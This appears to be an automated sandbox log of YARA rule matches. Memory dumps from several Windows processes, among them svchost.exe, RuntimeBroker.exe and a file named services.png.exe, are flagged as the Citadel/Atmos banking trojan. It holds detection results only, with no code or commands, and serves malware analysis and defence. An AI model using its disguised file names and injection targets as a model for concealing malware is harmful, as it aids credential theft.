Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.3.services.png.exe.2590000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.3.services.png.exe.2590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
